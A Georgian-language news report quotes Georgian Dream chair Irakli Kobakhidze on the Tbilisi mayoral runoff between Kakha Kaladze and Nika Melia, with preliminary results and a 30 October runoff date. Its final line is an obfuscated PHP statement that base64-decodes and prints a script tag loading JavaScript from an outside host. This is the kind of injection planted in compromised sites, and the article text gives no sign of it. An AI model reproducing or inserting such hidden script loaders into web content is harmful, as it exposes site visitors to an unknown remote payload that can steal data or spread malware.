celsiusi
ავერსი საქკაბელი
“ქართული ოცნების” თავმდჯდომარის, ირაკლი კობახიძის თქმით, მათთვის საწყენია, რომ თბილისის მერის ასარჩევად არჩევნების მეორე ტურის ჩატარებაა საჭირო. ამის შესახებ მან დღეს, 3 ოქტომბერს, ცესკოს წინასწარი მონაცემების გამოქვეყნების შემდეგ განაცხადა.
 
წინასწარი შედეგების მიხედვით, თბილისის მერობისთვის მეორე ტურში კახა კალაძე და ნიკა მელია იბრძოლებენ.
 
“ქართული ოცნების” მერობის კანდიდატებმა არჩევნები პირველივე ტურში მოიგეს 64-დან 44 საარჩევნო ოლქში. მეორე ტური ჩატარდება მხოლოდ 20 მუნიციპალიტეტში. რა თქმა უნდა, ჩვენთვის განსაკუთრებით საწყენია, რომ მეორე ტურის ჩატარება საჭირო გახდა თბილისშიც.
 
თუმცა ბუნებრივია, ეჭვი არავის გვეპარება, რომ კახა კალაძე საბოლოოდ მოიგებს ამ არჩევნებს. ძალიან მნიშვნელოვანი, რომ კახა კალაძეს ეყოლება მყარი უმრავლესობა თბილისის საკრებულოში მომდევნო 4 წლის განმავლობაში. ცესკოს წინასწარი მონაცემების თანახმად, ქართული ოცნება, სულ მცირე, 29 წევრით იქნება საკრებულოში წარმოდგენილი, უმრავლესობას 26 წევრი სჭირდება.
 
კიდევ ერთხელ აღვნიშნავთ, რომ ქართული ოცნების გუშინდელი დამაჯერებელი გამარჯვება იყო საქართველოში მშვიდობის, სტაბილურობისა და განვითარების გამარჯვება”,  - განაცხადა კობახიძემ.
 
მისივე თქმით, ადგილობრივი თვითმმართველობის არჩევნების მეორე ტური 30 ოქტომბერს გაიმართება.
 
994
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");